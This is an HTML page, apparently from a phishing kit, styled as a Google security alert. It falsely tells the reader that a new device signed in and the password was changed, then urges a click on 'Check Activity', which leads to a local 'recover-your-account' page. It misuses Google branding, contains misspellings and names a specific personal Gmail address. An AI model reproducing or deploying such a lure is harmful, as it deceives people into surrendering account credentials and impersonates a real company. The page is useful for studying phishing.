<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Gmail Security Alart</title>
    <link rel="stylesheet" href="css/styles.css">
  </head>
  <body class="body1">
    <div class="di container">


  <h1><img class="indexgoogle" src="imagesgmail/google1.png" alt=""></h1>
  <p class="nd">New device signed in to</p>

  <h3 class="h3index" ><img class="imagaccount" src="imagesgmail/googleimagep22.jpg" alt="">Christianogbonna247@gmail.com</h3>

 <hr>
 <div class="dc">



<div style="font-family:Roboto-Regular,Helvetica,Arial,sans-serif;font-size:14px;
color:rgba(0,0,0,0.87);line-height:20px;padding-top:20px;text-align:center; padding-right:30%; width:80%;">
<div class="notice">

Your Google Account was just signed in to from a new Tecno W4 device.And your password was changed
 You're getting this email to make sure it was you. if you are not the one,Check Activity to recover your account.</div>

<div class="bot">
  <button type="button" name="button"><a class="Check" href="recover-your-account">Check Activity</a></button>

</div>
        </div>
        </div>
        </div>
        <br>
        <p class="pb">You received this email to let you know about important changes to your Google Account and services.
© 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p>


  </body>
</html>
